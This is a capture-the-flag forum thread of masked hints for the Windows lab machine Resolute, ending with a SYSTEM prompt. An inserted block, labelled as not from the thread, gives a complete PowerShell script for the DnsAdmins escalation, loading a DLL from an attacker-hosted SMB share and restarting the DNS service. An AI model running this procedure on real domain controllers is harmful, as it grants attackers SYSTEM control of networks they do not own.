Resolute

Wrote in the wrong place, sorry.

Rooted! It was a bit frustrating at times, but I learned a lot from this one thanks @egre55. If you’re stuck PM me what you have tried and I will do my best to help.

rooted!

user1: It takes a little bit of time to understand what to look at; just open your eyes while you enum. With enum4****x it's simpler to see.

user2: Some admins make mistakes with passwords; some users change them and some others do not. When you reach the second user, read carefully what you can see, and search for something you cannot see without an eed dry l*t command.

root: use dnmd+imt-sms***r+mv***m, the last for the dll… I spent too much time remembering that I have little time to operate before everything turns back again.

very beautiful machine, very very good work, realistic is the right word

Any hint for the d** restart?

I'm spinning my wheels here. I have r***. I'm not exactly sure what M*******t module could be used with the creds as mentioned in this thread. I guess I'm missing what's right in front of my face. I feel like I'm missing crucial info in regards to enumeration. Could someone PM me with a nudge? First Windows box. Thank you all.

@jgfreeski said:

I'm looking to get into User right now, and I'm stuck trying to find a way in with user and pass credentials. I'm using e***-w**** and I keep getting authorization errors. Any nudge in the right direction would be great!

Maybe try a different user…

@qwas2zx9 said:

I have already done a d** injection using user2 and I am having trouble restarting the d*s server. Can you give me a nudge?

net start and friends didn't work for me, but sc.exe did. It's also important to use sc.exe to disambiguate if you are in a PowerShell environment (sc is an alias for Set-Content).

Finally rooted !!! Thanks @kkaz for the help.

@ctlfish said:

@qwas2zx9 said:

I have already done a d** injection using user2 and I am having trouble restarting the d*s server. Can you give me a nudge?

net start and friends didn't work for me, but sc.exe did. It's also important to use sc.exe to disambiguate if you are in a PowerShell environment (sc is an alias for Set-Content).

I rooted it using a different approach, but I want to take the hard path, which is injecting the dll and restarting the service. I am struggling with the hard method.

Spoiler Removed


Well this machine was a b**** due to my severe lack of Windows knowledge. I learned some valuable lessons though. If I could give some hints:

For user 1: Basic enumeration, go through all output! Afterwards you simply have to know how to use it; some ports are more than what they seem.

For user 2: Dig through the root with /h.

For root: Compile your file for the right architecture. You don't have to evade anti-virus if you compile your own file; you can simply download it onto the target. Of course you can alternatively generate it with mm and use It sm*****r to evade AV. Also, check the registry key to make sure your file has been set correctly. There are some excellent articles written on this method; be sure to read them thoroughly once you have the right exploit.

I loved this box! It’s really realistic and takes a bit of time to look through to gather the required parts needed to own.

User 1:

Finding the first user requires a bit of enumeration in order to find more information about the LP setup, including users. There is a tool you can use to help with this. e4***x is helpful, and so is the search tool (think about what kind of box this is) that ippsec has shown. I personally used the latter to find my information, but both tools will work.

Maybe you found a note left by a lazy sysadmin, is it good? Maybe it’s for another user? Take the information you know from either of the above tools to find users that you can check to see if the note works on them too. There is a tool, again recently shown by ippsec, that makes this super easy.

Then you have to be evil and use what you now know to exploit a service running on the box to get a shell.

User 2:

This was a bit of a problem for me, and it shouldn't have been. Being a Linux guy myself, I always use the -a flag when doing a directory listing. Maybe something like this will help in the root directory? If you find something that looks interesting, keep looking and you will find a file that contains some magic information.

Again, be evil and use what you know to get a shell.

Root

I spent too much time on this when I had it all along. I knew from my nmap scan that a service was running on a low port, but I couldn't find information on the box. I was trying to see who I was, but I wasn't seeing all of that information. Because of this, I wasn't seeing everything I needed to. Once I did, I saw I was privileged to manage a service on the box.

Sharpen your Google-fu and look around for a known way to use this privilege to get SYSTEM. It's actually pretty easy. Host a certain file, manage the service in your shell, listen, and you might get what you're looking for.

C:\Users\Administrator\Desktop>whoami && hostname && ipconfig
whoami && hostname && ipconfig
nt authority\system
Resolute
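As an added example that is not from any post in this thread, here is the root-stage procedure the hints above describe, written out in PowerShell: check group membership with the extra whoami argument, note the server architecture before compiling the DLL, set the plugin DLL with dnscmd, verify the registry value before touching the service (as the earlier hint says), and restart the service with sc.exe rather than the PowerShell sc alias. The share path, DLL name and the bounded stop/start loop are assumptions; it presumes a shell on the DNS server as a DnsAdmins member and a DLL you host yourself.

```powershell
# Added example, not code from the thread. Placeholders below are assumptions:
$DllPath = '\\10.10.14.5\share\plugin.dll'   # assumed path to your hosted DLL
$Params  = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

# 1. "whoami" alone hides group memberships; the extra argument shows them.
#    The DNS plugin trick only works from the DnsAdmins group.
$groups = whoami /groups
if (-not ($groups | Select-String -SimpleMatch 'DnsAdmins')) {
    throw 'Current user is not in DnsAdmins; this privilege path does not apply.'
}

# 2. Compile the DLL for the server's architecture, not your attack box's.
$arch = if ([Environment]::Is64BitOperatingSystem) { 'x64' } else { 'x86' }
Write-Host "DNS server is $arch; build the plugin DLL as $arch."

# 3. Point the DNS service at the plugin DLL. dnscmd writes the value
#    ServerLevelPluginDll under the DNS service's Parameters key.
dnscmd.exe /config /serverlevelplugindll $DllPath

# 4. Verify the registry value actually got set before restarting anything.
$set = (Get-ItemProperty -Path $Params -Name ServerLevelPluginDll -ErrorAction Stop).ServerLevelPluginDll
if ($set -ne $DllPath) {
    throw "ServerLevelPluginDll is '$set', expected '$DllPath'"
}

# 5. Restart the service. Use sc.exe explicitly: in PowerShell, "sc" is an
#    alias for Set-Content, so "sc stop dns" would try to write a file, not
#    stop the service. net start/stop may also fail for a DnsAdmins user.
sc.exe stop dns
$tries = 0
do {
    Start-Sleep -Seconds 1
    $tries++
} until (((sc.exe query dns) -match 'STOPPED') -or ($tries -ge 30))
if ($tries -ge 30) { throw 'DNS service did not reach STOPPED; check it manually.' }
sc.exe start dns   # the DLL is loaded by the service as SYSTEM on start

# 6. Cleanup once you have your shell: clear the plugin value so the service
#    starts normally next time (needs rights on the key, e.g. from SYSTEM).
# Remove-ItemProperty -Path $Params -Name ServerLevelPluginDll
```

Have the listener ready before step 5; the service start is what loads the DLL. If the DLL never returns from its init export, the service start will hang and later restarts fail, which is one reason the thread sees trouble "restarting the d*s server".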

Need a hint for the dll; it's been built as x64, but in DnsPluginInitialize no shell spawns.

Hi guys, I am having trouble connecting with the i******-s****r. Similar problem to others: the server is running and a connection is made, but the file is not requested. Can anyone DM me about this?

Ohh, I found a lot of users… btw, first Windows box… I hope Resolute will guide me…

Can someone tell me why it says that r*** is not a dn**n when I execute "net user /domain r" in the "local group memberships"? It seems to be giving the same kind of information in the RP* daemon as well. I have tried switching VPN files, but it still shows the same thing… This is really frustrating because I have been on this machine for weeks.

@OddRabbit said:

Can someone tell me why it says that r*** is not a dn**n when I execute "net user /domain r" in the "local group memberships"? It seems to be giving the same kind of information in the RP* daemon as well. I have tried switching VPN files, but it still shows the same thing… This is really frustrating because I have been on this machine for weeks.

Are you looking at all of the privs for r***? Try another command that will tell you who you are, but with an extra argument.

@mav3n said:

@OddRabbit said:

Can someone tell me why it says that r*** is not a dn**n when I execute "net user /domain r" in the "local group memberships"? It seems to be giving the same kind of information in the RP* daemon as well. I have tried switching VPN files, but it still shows the same thing… This is really frustrating because I have been on this machine for weeks.

Are you looking at all of the privs for r***? Try another command that will tell you who you are, but with an extra argument.

Thank you so much!!!